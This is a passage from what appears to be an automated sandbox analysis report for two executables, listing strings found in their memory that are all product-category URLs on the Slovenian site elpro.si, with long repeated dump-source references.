                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/iso-17665/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/mil-std-461f/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/mil-std-810g/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/sist-en-60529/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/sist-en-61515/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/digita
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/modula
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/nadzor
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/ostalo
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/pisaln
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/prosto
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/regulatorji-prikazovalniki-pisalniki-casovniki-stevci/zancno
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/livarstvo/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, 